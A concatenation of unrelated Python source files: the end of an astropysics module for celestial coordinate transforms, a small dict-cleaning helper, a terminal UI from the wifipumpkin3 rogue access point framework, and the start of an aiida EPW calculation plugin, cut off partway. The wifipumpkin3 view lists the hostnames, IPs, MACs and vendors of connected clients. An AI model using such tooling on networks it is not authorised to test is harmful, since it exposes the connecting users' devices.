from ..utils import rotation_matrix
jd = epoch_to_jd(eqsys.epoch)
eqo = equation_of_the_origins(jd)*15. #hours>degrees
return rotation_matrix(-eqo,'z',True)
@CoordinateSystem.registerTransform(CIRSCoordinates,'self',transtype='smatrix')
def _fromCIRS(cirssys):
return EquatorialCoordinatesEquinox._toCIRS(cirssys).T
class ITRSCoordinates(EpochalLatLongCoordinates):
"""
Coordinates based on the International Terrestrial Reference System. The
particular implementation here assumes ITRS matches the WGS84 coordinates
(used by GPS) - for astronomical purposes, this is a perfectly good
assumption.
Epoch transformations in this system only adjust for polar motion - to
account for earth rotation, transform back to
:class:`CIRSCoordinates` or :class:`EquatorialCoordinatesEquinox`,
change the epoch, then transfrom back to :class:`ITRSCoordinates`.
Because polar motion is not fully predictable, a number of methods are
available for approximating it. To choose a method, set the
:attr:`ITRSCoordinates.polarmotion` class attribute -- this will also affect
all future transformations to :class:`ITRSCoordinates` from other coordinate
systems. The following are valid values:
* None
Assumes the pole locations are fixed to the CIP at all times, aside
from the tiny effect of s' (the TIO-CIO shift).
* A 2-tuple of callables (xp,yp)
They will be called as xp(epoch) and yp(epoch) and the result will
be assumed to give the x and y coordinates of the poles in the CIP
frame.
.. note::
The transformations from CIRS and Equinox systems to ITRS technically
involve converting to TIRS (the Terrestrial Intermediate Reference
System), distinguished from ITRS by no polar motion correction. While
there is no class explicitly representing TIRS, ITRS with :attr:`epoch`
set to None is equivalent to TIRS.
"""
__slots__ = tuple('_dpc')
#_dpc is included for transformation to/from Equatorial-like systems
_longrange_ = (-180,180)
polarmotion = None
"""
Technique of computing poles (see :class:`ITRSCoordinates` documentation)
"""
@staticmethod
def _TIOLocator(epoch):
"""
s-prime, the offset between the0 of longitude for the CIO of CIRS and
the TIO of TIRS (Terrestrial Intermediate Reference System) - TIRS and
ITRS differ by polar motion. Return value in radians.
This is really,really small, and isn't really necessary except for
completeness
"""
from ..constants import asecperrad
T = (epoch-2000)/100
return -47e-6*T/asecperrad
@staticmethod
def _WMatrix(epoch):
from ..utils import rotation_matrix
sp = ITRSCoordinates._TIOLocator(epoch)
if ITRSCoordinates.polarmotion is None:
xp = 0
yp = 0
else: #assume 2-sequence (xp,yp)
xp,yp = ITRSCoordinates.polarmotion
if callable(xp):
xp = xp(epoch)
if callable(yp):
yp = yp(epoch)
#TODO: test if the following, linear matrix is good enough to not
#bother with the "right" one:
#[[1,-sp,-xp],
# [sp,1,yp],
# [xp,-yp,1]] #can also do sp->0
return rotation_matrix(-yp,'x') *\
rotation_matrix(-xp,'y') *\
rotation_matrix(sp,'z')
def transformToEpoch(self,newepoch):
"""
Transforms these :class:`ITRSCoordinates` to a new epoch, adjusting the
coordinate values for polar motion.
"""
if self.epoch is not None and newepoch is not None:
M = self._WMatrix(self.epoch).T
Mn = self._WMatrix(newepoch)
self.matrixRotate(Mn*M)
#this sets the epoch
EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
@add_docs(EpochalLatLongCoordinates.convert)
def convert(self,tosys,optimize=_convertoptimizedefault):
''
res = EpochalLatLongCoordinates.convert(self,tosys,optimize)
if self._dpc is not None:
res._dpc = self._dpc
return res
@CoordinateSystem.registerTransform(CIRSCoordinates,'self',transtype='smatrix')
def _fromEqC(eqc):
from .funcs import earth_rotation_angle
from ..obstools import epoch_to_jd
from ..utils import rotation_matrix
epoch = eqc.epoch
if epoch is not None:
jd = epoch_to_jd(eqc.epoch)
era = earth_rotation_angle(jd,degrees=True)
W = ITRSCoordinates._WMatrix(eqc.epoch)
return W*rotation_matrix(era)
else:
return np.eye(3).view(np.matrix)
@CoordinateSystem.registerTransform(EquatorialCoordinatesEquinox,'self',transtype='smatrix')
def _fromEqE(eqe):
from .funcs import greenwich_sidereal_time
from ..utils import rotation_matrix
from ..obstools import epoch_to_jd
epoch = eqe.epoch
if epoch is not None:
jd = epoch_to_jd(eqe.epoch)
try:
gst = greenwich_sidereal_time(jd,True)*15. #hours -> degrees
except Exception,e:
from warnings import warn
warn('temporarily bypassing problem with greenwich_sidereal_time:%s'%e)
gst = greenwich_sidereal_time(jd,'simple')*15. #hours -> degrees
W = ITRSCoordinates._WMatrix(eqe.epoch)
return W*rotation_matrix(gst)
else:
return np.eye(3).view(np.matrix)
@CoordinateSystem.registerTransform('self',CIRSCoordinates,transtype='smatrix')
def _toEqC(itrsc):
#really we want inverse, but rotations are unitary -> inv==transpose
#we provide itrsc in the call because the epoch is needed
return ITRSCoordinates._fromEqC(itrsc).T
@CoordinateSystem.registerTransform('self',EquatorialCoordinatesEquinox,transtype='smatrix')
def _toEqE(itrsc):
#really we want inverse, but rotations are unitary -> inv==transpose
#we provide itrsc in the call because the epoch is needed
return ITRSCoordinates._fromEqE(itrsc).T
class FK5Coordinates(EquatorialCoordinatesEquinox):
"""
Equatorial Coordinates fixed to the FK5 reference system.
"""
__slots__ = tuple()
@staticmethod
def _precessionMatrixJ(epoch1,epoch2):
"""
Computes the precession matrix from one Julian epoch to another
"""
from ..utils import rotation_matrix
T = (epoch1 - 2000)/100
dt = (epoch2 - epoch1)/100
pzeta = (0.017998,0.000344,0.30188,-0.000139,1.39656,2306.2181)
temp = pzeta[5] + T*(pzeta[4]+T*pzeta[3])
zeta = dt*(temp + dt*((pzeta[2]+pzeta[1]*T) + dt*pzeta[0]))/3600
pz = (0.018203,-0.000066,1.09468)
z = dt*(temp + dt*((pz[2]+pz[1]*T) + dt*pz[0]))/3600
ptheta = (-0.041833,-0.000217,-0.42665,-0.000217,-0.85330,2004.3109)
temp = ptheta[5] + T*(ptheta[4]+T*ptheta[3])
theta = dt*(temp + dt*((ptheta[2]+ptheta[1]*T) + dt*ptheta[0]))/3600
return rotation_matrix(-z,'z') *\
rotation_matrix(theta,'y') *\
rotation_matrix(-zeta,'z')
def transformToEpoch(self,newepoch):
"""
Transforms these :class:`EquatorialCoordinates` to a new epoch. Uses the
algorithm resolved by the IAU in 1976 as written in Meeus, as well as
Lieske, J.H. 1979.
According to SOFA, this for becomes less valid at the following levels:
* 1960 CE to 2040 CE
< 0.1"
* 1640 CE to 2360 CE
< 1"
* 500 BCE to 3000 CE
< 3"
* 1200 BCE to 3900 CE
> 10"
* 4200 BCE to 5600 CE
> 100"
* 6800 BCE to 8200 CE
> 1000"
"""
if self.epoch is not None and newepoch is not None:
self.matrixRotate(self._precessionMatrixJ(self.epoch,newepoch))
EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
@CoordinateSystem.registerTransform(ICRSCoordinates,'self',transtype='smatrix')
def _fromICRS(icrsc):
"""
B-matrix from USNO circular 179
"""
from ..utils import rotation_matrix
eta0 = -19.9/3600000
xi0 = 9.1/3600000
da0 = -22.9/3600000
B = rotation_matrix(-eta0,'x') *\
rotation_matrix(xi0,'y') *\
rotation_matrix(da0,'z')
epoch = icrsc.epoch
if icrsc.epoch is None:
return B
else:
return FK5Coordinates._precessionMatrixJ(2000,icrsc.epoch)*B
@CoordinateSystem.registerTransform('self',ICRSCoordinates,transtype='smatrix')
def _toICRS(fk5c):
return FK5Coordinates._fromICRS(fk5c).T
class FK4Coordinates(EquatorialCoordinatesEquinox):
"""
Equatorial Coordinates fixed to the FK4 reference system. Note that this
implementation does *not* correct for the elliptic terms of aberration
as of yet.
Epoch is Besselian.
"""
__slots__ = tuple()
julianepoch = False
def __init__(self,*args,**kwargs):
"""
Input for FK4 coordinates. Can follow any of the following forms:
* EquatorialCoordinatesBase()
* EquatorialCoordinatesBase(:class:`EquatorialCoordinatesBase`)
* EquatorialCoordinatesBase('rastr decstr')
* EquatorialCoordinatesBase((ra,dec))
* EquatorialCoordinatesBase(ra,dec)
* EquatorialCoordinatesBase(ra,fdec,raerr,decerr)
* EquatorialCoordinatesBase(ra,dec,raerr,decerr,epoch)
* EquatorialCoordinatesBase(ra,dec,raerr,decerr,epoch,distancepc)
The epoch of FK4 coordinates defaults to B1950.
"""
args = list(args)
args.insert(0,self)
EquatorialCoordinatesEquinox.__init__(*args,**kwargs)
if self._epoch==2000.:
self._epoch = 1950.
def transformToEpoch(self,newepoch):
"""
Transforms these :class:`EquatorialCoordinates` to a new epoch. Uses the
method of Newcomb (pre-IAU1976) to compute precession.
"""
if self.epoch is not None and newepoch is not None:
self.matrixRotate(self._precessionMatrixB(self.epoch,newepoch))
EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
@staticmethod
def _precessionMatrixB(epoch1,epoch2):
"""
computes the precession matrix from one Besselian epoch to another using
Newcomb's method.
"""
from ..utils import rotation_matrix
#tropical years
t1 = (epoch1-1850.0)/1000.0
t2 = (epoch2-1850.0)/1000.0
dt = t2 - t1
zeta1 = 23035.545 + t1*139.720+0.060*t1*t1
zeta2 = 30.240 - 0.27*t1
zeta3 = 17.995
pzeta = (zeta3,zeta2,zeta1,0)
zeta = np.polyval(pzeta,dt)/3600
z1 = 23035.545 + t1*139.720 + 0.060*t1*t1
z2 = 109.480 + 0.39*t1
z3 = 18.325
pz = (z3,z2,z1,0)
z = np.polyval(pz,dt)/3600
theta1 = 20051.12 - 85.29*t1 - 0.37*t1*t1
theta2 = -42.65 - 0.37*t1
theta3 = -41.8
ptheta = (theta3,theta2,theta1,0)
theta = np.polyval(ptheta,dt)/3600
return rotation_matrix(-z,'z') *\
rotation_matrix(theta,'y') *\
rotation_matrix(-zeta,'z')
@CoordinateSystem.registerTransform('self',FK5Coordinates,transtype='smatrix')
def _toFK5(fk4c):
from ..obstools import epoch_to_jd,jd_to_epoch
#B1950->J2000 matrix from Murray 1989 A&A 218,325
B = np.mat([[0.9999256794956877,-0.0111814832204662,-0.0048590038153592],
[0.0111814832391717,0.9999374848933135,-0.0000271625947142],
[0.0048590037723143,-0.0000271702937440,0.9999881946023742]])
if fk4c.epoch is not None and fk4c.epoch != 1950:
jd = epoch_to_jd(fk4c.epoch,False)
jepoch = jd_to_epoch(jd)
T = (jepoch - 1950)/100
#now add in correction terms for FK4 rotating system
B[0,0] += -2.6455262e-9*T
B[0,1] += -1.1539918689e-6*T
B[0,2] += 2.1111346190e-6*T
B[1,0] += 1.1540628161e-6*T
B[1,1] += -1.29042997e-8*T
B[1,2] += 2.36021478e-8*T
B[2,0] += -2.1112979048e-6*T
B[2,1] += -5.6024448e-9*T
B[2,2] += 1.02587734e-8*T
PB = FK4Coordinates._precessionMatrixB(fk4c.epoch,1950)
return B*PB
else:
return B
@CoordinateSystem.registerTransform(FK5Coordinates,'self',transtype='smatrix')
def _fromFK5(fk5c):
#need inverse because Murray's matrix is *not* a true rotation matrix
return FK4Coordinates._toFK5(fk5c).I
class EclipticCoordinatesCIRS(EpochalLatLongCoordinates):
"""
Ecliptic Coordinates (beta, lambda) such that the fundamental plane passes
through the ecliptic at the current epoch.
Note that because the concept of the ecliptic can be complicated or even
ill-defined, ecliptic coordinates is astropysics are simply defined as
tied to a particular set of equatorial coordinates with a given obliquity
model. For :class:`EclipticCoordinatesCIRS`, the equatorial
coordinates are :class:`CIRSCoordinates` with obliquity
given by the IAU 2006 obliquity model (see :func:`obliquity`)
"""
__slots__ = ()
_longlatnames_ = ('lamb','beta')
_longrange_ = (0,360)
obliqyear = 2006
def __init__(self,lamb=0,beta=0,lamberr=None,betaerr=None,epoch=2000,
distanceau=None):
"""
See the associated attribute docstrings for the meaning of the inputs.
"""
EpochalLatLongCoordinates.__init__(self,lamb,beta,lamberr,betaerr,epoch)
self.distanceau = distanceau
@CoordinateSystem.registerTransform('self',CIRSCoordinates,transtype='smatrix')
def _toEq(eclsc):
from .funcs import obliquity
from ..utils import rotation_matrix
return rotation_matrix(-obliquity(eclsc.jdepoch,EclipticCoordinatesCIRS.obliqyear),'x')
@CoordinateSystem.registerTransform(CIRSCoordinates,'self',transtype='smatrix')
def _fromEq(eqc):
from .funcs import obliquity
from ..utils import rotation_matrix
return rotation_matrix(obliquity(eqc.jdepoch,EclipticCoordinatesCIRS.obliqyear),'x')
def transformToEpoch(self,newepoch):
if self.epoch is not None and newepoch is not None:
eqc = self.convert(CIRSCoordinates)
eqc.epoch = newepoch
newval = eqc.convert(self.__class__)
self._lat._decval = newval._lat._decval
self._long._decval = newval._long._decval
self._laterr._decval = newval._lat._decval
self._longerr._decval = newval._longerr._decval
EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
class EclipticCoordinatesEquinox(EpochalLatLongCoordinates):
"""
Ecliptic Coordinates (beta, lambda) such that the fundamental plane passes
through the ecliptic at the current epoch.
Note that because the concept of the ecliptic can be complicated or even
ill-defined, ecliptic coordinates is astropysics are simply defined as tied
to a particular set of equatorial coordinates with a given obliquity model.
For :class:`EclipticCoordinatesEquinox`, the equatorial coordinates are
:class:`EquatorialCoordinatesEquinox` with obliquity given by the IAU 1980
obliquity model (see :func:`~astropysics.coords.funcs.obliquity`)
"""
__slots__ = ()
_longlatnames_ = ('lamb','beta')
_longrange_ = (0,360)
obliqyear = 1980
def __init__(self,lamb=0,beta=0,lamberr=None,betaerr=None,epoch=2000,
distanceau=None):
"""
See the associated attribute docstrings for the meaning of the inputs.
"""
EpochalLatLongCoordinates.__init__(self,lamb,beta,lamberr,betaerr,epoch)
self.distanceau = distanceau
@CoordinateSystem.registerTransform('self',EquatorialCoordinatesEquinox,transtype='smatrix')
def _toEq(eclsc):
from .funcs import obliquity
from ..utils import rotation_matrix
return rotation_matrix(-obliquity(eclsc.jdepoch,EclipticCoordinatesEquinox.obliqyear),'x')
@CoordinateSystem.registerTransform(EquatorialCoordinatesEquinox,'self',transtype='smatrix')
def _fromEq(eqc):
from .funcs import obliquity
from ..utils import rotation_matrix
return rotation_matrix(obliquity(eqc.jdepoch,EclipticCoordinatesEquinox.obliqyear),'x')
def transformToEpoch(self,newepoch):
if self.epoch is not None and newepoch is not None:
eqc = self.convert(EquatorialCoordinatesEquinox)
eqc.epoch = newepoch
newval = eqc.convert(self.__class__)
self._lat._decval = newval._lat._decval
self._long._decval = newval._long._decval
self._laterr._decval = newval._lat._decval
self._longerr._decval = newval._longerr._decval
EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
class RectangularGeocentricEclipticCoordinates(RectangularCoordinates,EpochalCoordinates):
"""
Rectangular coordinates oriented so that the x-y plane lies in the plane of
the ecliptic at the specified epoch. Distances are in AU. Origin is at the
center of mass of the Earth.
Note that the epoch should not be set directly - if precession is desired
desired, convert to an Ecliptic coordinate system, do the precession, and
convert back.
"""
__slots__ = tuple()
julianepoch = True
def __init__(self,x,y,z,epoch=None):
RectangularCoordinates.__init__(self,x,y,z)
self._epoch = epoch
def __getstate__(self):
d = RectangularCoordinates.__getstate__(self)
d.update(EpochalCoordinates.__getstate__(self))
return d
def __setstate__(self,d):
RectangularCoordinates.__setstate__(self,d)
EpochalCoordinates.__setstate__(self,d)
def __str__(self):
if self.epoch is None:
epochstr = ''
else:
epochstr = ' ('+self.epochstr+')'
return RectangularCoordinates.__str__(self) + epochstr
def transformToEpoch(self,newepoch):
EpochalCoordinates.transformToEpoch(newepoch)
@CoordinateSystem.registerTransform('self',EclipticCoordinatesCIRS)
def _toEcC(rec):
from math import asin,atan2,degrees
x,y,z = rec.x,rec.y,rec.z
r = (x*x+y*y+z*z)**0.5
beta = degrees(asin(z/r))
lamb = degrees(atan2(y,x))
return EclipticCoordinatesCIRS(lamb,beta,distanceau=r,epoch=rec.epoch)
@CoordinateSystem.registerTransform('self',EclipticCoordinatesEquinox)
def _toEcQ(rec):
from math import asin,atan2,degrees
x,y,z = rec.x,rec.y,rec.z
r = (x*x+y*y+z*z)**0.5
beta = degrees(asin(z/r))
lamb = degrees(atan2(y,x))
return EclipticCoordinatesEquinox(lamb,beta,distanceau=r,epoch=rec.epoch)
@CoordinateSystem.registerTransform(EclipticCoordinatesCIRS,'self')
def _fromEcC(ec):
from math import sin,cos,degrees
l,b = ec.lamb.r,ec.beta.r
if ec.distanceau is None:
r = 1
else:
r = ec.distanceau[0]
x = r*cos(l)*cos(b)
y = r*sin(l)*cos(b)
z = r*sin(b)
return RectangularGeocentricEclipticCoordinates(x,y,z,ec.epoch)
@CoordinateSystem.registerTransform(EclipticCoordinatesEquinox,'self')
def _fromEcQ(ec):
from math import sin,cos,degrees
l,b = ec.lamb.r,ec.beta.r
if ec.distanceau is None:
r = 1
else:
r = ec.distanceau[0]
x = r*cos(l)*cos(b)
y = r*sin(l)*cos(b)
z = r*sin(b)
return RectangularGeocentricEclipticCoordinates(x,y,z,ec.epoch)
class GalacticCoordinates(EpochalLatLongCoordinates):
__slots__ = tuple()
_longlatnames_ = ('l','b')
_longrange_ = (0,360)
_ngp_J2000 = FK5Coordinates(192.859508, 27.128336,epoch=2000)
_long0_J2000 = AngularCoordinate(122.932)
_ngp_B1950 = FK4Coordinates(192.25, 27.4,epoch=1950)
_long0_B1950 = AngularCoordinate(123)
def transformToEpoch(self,newepoch):
"""
Galactic coordinates are nominally inertial, although the definition is
a bit unclear in that regard.
"""
EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
@CoordinateSystem.registerTransform(FK5Coordinates,'self',transtype='smatrix')
def _fromFK5(fk5coords):
from ..utils import rotation_matrix
epoch = 2000 if fk5coords.epoch is None else fk5coords.epoch
mat = rotation_matrix(180 - GalacticCoordinates._long0_J2000.d,'z') *\
rotation_matrix(90 - GalacticCoordinates._ngp_J2000.dec.d,'y') *\
rotation_matrix(GalacticCoordinates._ngp_J2000.ra.d,'z') *\
FK5Coordinates._precessionMatrixJ(epoch,2000)
mat.nocache = True #can't cache because of the need to get the epoch
return mat
@CoordinateSystem.registerTransform('self',FK5Coordinates,transtype='smatrix')
def _toFK5(galcoords):
return GalacticCoordinates._fromFK5(galcoords).T
@CoordinateSystem.registerTransform(FK4Coordinates,'self',transtype='smatrix')
def _fromFK4(fk4coords):
from ..utils import rotation_matrix
epoch = 1950 if fk4coords.epoch is None else fk4coords.epoch
mat = rotation_matrix(180 - GalacticCoordinates._long0_B1950.d,'z') *\
rotation_matrix(90 - GalacticCoordinates._ngp_B1950.dec.d,'y') *\
rotation_matrix(GalacticCoordinates._ngp_B1950.ra.d,'z') *\
FK4Coordinates._precessionMatrixB(epoch,1950)
mat.nocache = True #can't cache because of the need to get the epoch
return mat
@CoordinateSystem.registerTransform('self',FK4Coordinates,transtype='smatrix')
def _toFK4(galcoords):
return GalacticCoordinates._fromFK4(galcoords).T
class SupergalacticCoordinates(EpochalLatLongCoordinates):
__slots__ = tuple()
_longlatnames_ = ('sgl','sgb')
_longrange_ = (0,360)
_nsgp_gal = GalacticCoordinates(47.37,6.32) #glactc is 47.47=WRONG
_sg0_gal = GalacticCoordinates(137.37,0)
def transformToEpoch(self,newepoch):
"""
Supergalactic coordinates are nominally inertial, although the
definition is a bit unclear in that regard.
"""
EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
@CoordinateSystem.registerTransform('self',GalacticCoordinates,transtype='smatrix')
def _toGal(sgalcoords):
return SupergalacticCoordinates._fromGal(sgalcoords).T
@CoordinateSystem.registerTransform(GalacticCoordinates,'self',transtype='smatrix')
def _fromGal(galcoords):
from ..utils import rotation_matrix
z1r = rotation_matrix(SupergalacticCoordinates._nsgp_gal.l.d,'z')
yr = rotation_matrix(90 - SupergalacticCoordinates._nsgp_gal.b.d,'y')
z2r = rotation_matrix(180 - SupergalacticCoordinates._sg0_gal.l.d +\
SupergalacticCoordinates._nsgp_gal.l.d,'z')
return z2r*yr*z1r
class HorizontalCoordinates(LatLongCoordinates):
"""
This object represents an angular location on the unit sphere, with the
north pole of the coordinate position fixed to the local zenith
To convert from other :class:`Coordinate` types to horizontal positions, see
:class:`astropysics.obstools.Site`, as site information is required for
these corrections
"""
__slots__ = tuple()
_longlatnames_ = ('az','alt')
_longrange_ = (0,360)
def __init__(self,alt=0,az=0,alterr=None,azerr=None,distancepc=None):
"""
See the associated attribute docstrings for the meaning of the inputs.
"""
LatLongCoordinates.__init__(self,az,alt,azerr,alterr,distancepc)
@CoordinateSystem.registerTransform(EquatorialCoordinatesEquinox,'self')
@CoordinateSystem.registerTransform(CIRSCoordinates,'self')
def _toHoriz(incoosys=None):
raise TypeError('use astropysics.obstools.Site methods to transform celestial to terrestrial coordinates')
@CoordinateSystem.registerTransform('self',EquatorialCoordinatesEquinox)
@CoordinateSystem.registerTransform('self',CIRSCoordinates)
def _fromHoriz(incoosys=None):
raise TypeError('use astropysics.obstools.Site methods to transform terrestrial to celestial coordinates')
#Now that all the coordinate systems have been made, add the diagram to the docs
#That shows the graph of the built-in transforms
postbuiltin = """
A similar diagram can be generated after the user has created and registered
custom coordinates and transforms::
from networkx import to_agraph,relabel_nodes,draw_networkx
from astropysics.coords import CoordinateSystem
graph = CoordinateSystem.getTransformGraph()
dotgraph = to_agraph(relabel_nodes(graph,lambda n:n.__name__))
dotgraph.graph_attr.update(dict(size='12.0, 12.0',fontsize=12))
dotgraph.write('mygraph.dot')
draw_networkx(graph)
This will save a graphviz dot file and displaying the graph with matplotlib,
showing both builtin and custom-added coordinates and transforms.
"""
try:
from networkx import to_agraph,relabel_nodes
graph = to_agraph(relabel_nodes(CoordinateSystem.getTransformGraph(),lambda n:n.__name__))
graph.graph_attr.update(dict(size=r'12.0, 12.0',fontsize=12))
transstr="""
Built-in Transforms
^^^^^^^^^^^^^^^^^^^
A number of coordinate systems are provided built into astropysics. Most of
these have pre-defined standard transformations. The built-in coordinate classes
with defined transformation are shown in the diagram below.
.. graphviz::
"""+graph.string().replace('\n','\n ')+postbuiltin
__doc__ = __doc__.replace('{transformdiagram}',transstr)
del to_agraph,relabel_nodes,graph
except ImportError:
#if networkx or pygraphviz isn't present, drop the diagram but add a warning that it's missing
warningstr = """
Builtin Coordinate System Transforms
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.. warning::
A diagram showing the relationships between the pre-defined transformations
should be here, but this copy of the documentation was built without
`networkx <http://networkx.lanl.gov/>` and `pygraphviz
<http://networkx.lanl.gov/pygraphviz/>` available to build the diagram.
Please re-build this file after those packages are installed to see the
diagram.
"""+postbuiltin
__doc__ = __doc__.replace('{transformdiagram}',warningstr)
del warningstr
#<--------------------------Convinience Functions------------------------------>
def angular_string_to_dec(instr,hms=True,degrees=True):
"""
Convinience function to convert a angular coordinate string to a decimal
value.
:param hms:
If True, the coordinate will be assumed to be h:m:s, otherwise d:m:s.
This will be ignored if the coordinates are specified as ##h##m##s or
##d##m##s, or if the input is not in sexigesimal form.
:type hms: boolean
:param degrees:
If True, the output will be decimal degrees, otherwise radians.
:type degrees: boolean
:returns: Decimal value in radians or degrees
"""
ac = AngularCoordinate(instr)
if degrees:
return ac.degrees
else:
return ac.radians
def objects_to_coordinate_arrays(posobjs,coords='auto',degrees=True):
"""
converts a sequence of position objects into an array of coordinates.
`coords` determines the order of the output coordinates - it can be a
comma-seperated list of coordinate names or if 'auto', it will be 'lat,long'
for all coordinate systems except for Equatorial, which will use 'ra,dec'
if `degrees` is True, returned arrays are in degrees, otherwise radians
"""
if coords=='auto':
coordnames = None
else:
coordnames = coords.split(',')
coords = []
if degrees:
for o in posobjs:
if coordnames is None:
if isinstance(o,EquatorialCoordinates):
coords.append((o.ra.d,o.dec.d))
else:
coords.append((o.lat.d,o.long.d))
else:
coords.append([getattr(o,c).d for c in coordnames])
else:
for o in posobjs:
if coordnames is None:
if isinstance(o,EquatorialCoordinates):
coords.append((o.ra.r,o.dec.r))
else:
coords.append((o.lat.r,o.long.r))
else:
coords.append([getattr(o,c).r for c in coordnames])
return np.array(coords).T
|
def clean_dict(data):
"""
Delete keys with the value ``None`` in a dictionary, recursively.
This alters the input so you may wish to ``copy`` the dict first.
"""
for key, value in list(data.items()):
if value is None:
del data[key]
elif isinstance(value, dict):
clean_dict(value)
elif isinstance(value, list):
data[key] = [
clean_dict(v) if isinstance(v, list) or isinstance(v, dict) else v
for v in value
]
return data
|
import urwid, time, threading
from tabulate import tabulate
from netaddr import EUI
from wifipumpkin3.core.utility.collection import SettingsINI
import wifipumpkin3.core.utility.constants as C
import fcntl, termios, struct, os
from wifipumpkin3.core.common.platforms import hexdump
from multiprocessing import Process
from wifipumpkin3.core.config.globalimport import *
from wifipumpkin3.core.ui.uimode import WidgetBase
# This file is part of the wifipumpkin3 Open Source Project.
# wifipumpkin3 is licensed under the Apache 2.0.
# Copyright 2020 P0cL4bs Team - Marcos Bomfim (mh4x0f)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
palette_color = [
("titlebar", "", ""),
("refresh button", "dark green,bold", "black"),
("quit button", "dark red,bold", "black"),
("getting quote", "dark blue", "black"),
("getting quote", "dark blue", ""),
("headers", "black,bold", "black"),
("change", "dark green", ""),
("change negative", "dark red", ""),
("body", "white", "black"),
("title", "black", "dark blue"),
]
class ui_TableMonitorClient(WidgetBase):
ConfigRoot = "ui_table_mod"
SubConfig = "ui_table_mod"
ID = "ui_table_mod"
Name = "ui_table_mod"
def __init__(self, parent):
self.parent = parent
self.table_clients = []
self.__threadServices = []
self.__threadStatus = False
self.header_text = [
("titlebar", ""),
"Clients: ",
("title", "UP"),
",",
("title", "DOWN"),
":scroll",
" Monitor DHCP Requests",
]
def getClientsCount(self):
return len(self.table_clients)
def setup_view(self):
self.header_wid = urwid.AttrWrap(urwid.Text(self.header_text), "title")
self.menu = urwid.Text([u"Press (", ("quit button", u"Q"), u") to quit."])
self.lwDevices = urwid.SimpleListWalker([])
self.body = urwid.ListBox(self.lwDevices)
self.main_box = urwid.LineBox(self.body)
self.layout = urwid.Frame(
header=self.header_wid, body=self.main_box, footer=self.menu
)
self.add_Clients(Refactor.readFileDataToJson(C.CLIENTS_CONNECTED))
def render_view(self):
return self.layout
def main(self):
self.setup_view()
loop = urwid.MainLoop(
self.render_view(), palette=palette_color, unhandled_input=self.handleWindow
)
loop.set_alarm_in(1, self.refresh)
loop.run()
def refresh(self, loop=None, data=None):
self.setup_view()
loop.widget = self.render_view()
loop.set_alarm_in(1, self.refresh)
def start(self):
self.main()
def stop(self):
if len(self.__threadServices) > 0:
self.table_clients = []
self.lwDevices.append(urwid.Text(("", self.up_Clients())))
def get_mac_vendor(self, mac):
""" discovery mac vendor by mac address """
try:
d_vendor = EUI(mac)
d_vendor = d_vendor.oui.registration().org
except:
d_vendor = "unknown vendor"
return d_vendor
def add_Clients(self, data_dict):
""" add client on table list() """
self.table_clients = []
for data in data_dict:
self.table_clients.append(
[
data_dict[data]["HOSTNAME"],
data_dict[data]["IP"],
data_dict[data]["MAC"],
self.get_mac_vendor(data_dict[data]["MAC"]),
]
)
self.lwDevices.clear()
self.lwDevices.append(urwid.Text(("", self.up_Clients())))
self._body.set_focus(len(self.lwDevices) - 1, "above")
def up_Clients(self):
if len(self.table_clients) > 0:
return tabulate(self.table_clients, ("Hostname", "IP", "Mac", "Vendor"))
return ""
def handleWindow(self, key):
if key == "R" or key == "r":
pass
elif key == "Q" or key == "q" or key == "esc":
raise urwid.ExitMainLoop()
|
# -*- coding: utf-8 -*-
"""Plugin to create a Quantum Espresso epw.x input file."""
import os
import numpy as np
from aiida import orm
from aiida.common import datastructures, exceptions
from aiida_quantumespresso.calculations import _lowercase_dict, _uppercase_dict
from aiida_quantumespresso.utils.convert import convert_input_to_namelist_entry
from .base import CalcJob
class EpwCalculation(CalcJob):
"""`CalcJob` implementation for the epw.x code of Quantum ESPRESSO."""
# Keywords that cannot be set by the user but will be set by the plugin
_blocked_keywords = [('INPUTEPW', 'outdir'), ('INPUTEPW', 'iverbosity'), ('INPUTEPW', 'prefix'),
('INPUTEPW', 'dvscf_dir'), ('INPUTEPW', 'amass'), ('INPUTEPW', 'nq1'), ('INPUTEPW', 'nq2'),
('INPUTEPW', 'nq3'), ('INPUTEPW', 'nk1'), ('INPUTEPW', 'nk2'), ('INPUTEPW', 'nk3')]
_use_kpoints = True
_compulsory_namelists = ['INPUTEPW']
# Default input and output files
_PREFIX = 'aiida'
_DEFAULT_INPUT_FILE = 'aiida.in'
_DEFAULT_OUTPUT_FILE = 'aiida.out'
_OUTPUT_XML_TENSOR_FILE_NAME = 'tensors.xml'
_OUTPUT_SUBFOLDER = './out/'
_SAVE_PREFIX = '/save/'
_FOLDER_SAVE = 'save'
_FOLDER_DYNAMICAL_MATRIX = 'DYN_MAT'
# Not using symlink in pw to allow multiple nscf to run on top of the same scf
_default_symlink_usage = False
@classmethod
def define(cls, spec):
"""Define the process specification."""
# yapf: disable
super().define(spec)
spec.input('metadata.options.input_filename', valid_type=str, default=cls._DEFAULT_INPUT_FILE)
spec.input('metadata.options.output_filename', valid_type=str, default=cls._DEFAULT_OUTPUT_FILE)
spec.input('metadata.options.withmpi', valid_type=bool, default=True)
spec.input('kpoints', valid_type=orm.KpointsData, help='coarse kpoint mesh')
spec.input('qpoints', valid_type=orm.KpointsData, help='coarse qpoint mesh')
spec.input('kfpoints', valid_type=orm.KpointsData, help='fine kpoint mesh')
spec.input('qfpoints', valid_type=orm.KpointsData, help='fine qpoint mesh')
spec.input('parameters', valid_type=orm.Dict, help='')
spec.input('settings', valid_type=orm.Dict, required=False, help='')
spec.input('parent_folder_nscf', valid_type=orm.RemoteData,
help='the folder of a completed nscf `PwCalculation`')
spec.input('parent_folder_ph', valid_type=orm.RemoteData, help='the folder of a completed `PhCalculation`')
def prepare_for_submission(self, folder): # pylint: disable=too-many-statements,too-many-branches
"""Prepare the calculation job for submission by transforming input nodes into input files.
In addition to the input files being written to the sandbox folder, a `CalcInfo` instance will be returned that
contains lists of files that need to be copied to the remote machine before job submission, as well as file
